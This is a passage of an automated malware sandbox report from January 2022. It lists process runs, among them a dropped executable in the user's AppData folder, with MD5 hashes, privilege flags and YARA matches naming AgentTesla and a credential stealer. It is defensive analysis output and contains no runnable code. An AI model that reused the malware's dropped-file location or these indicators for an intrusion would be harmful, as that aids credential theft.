                                                          Start time:10:23:10
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:54
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
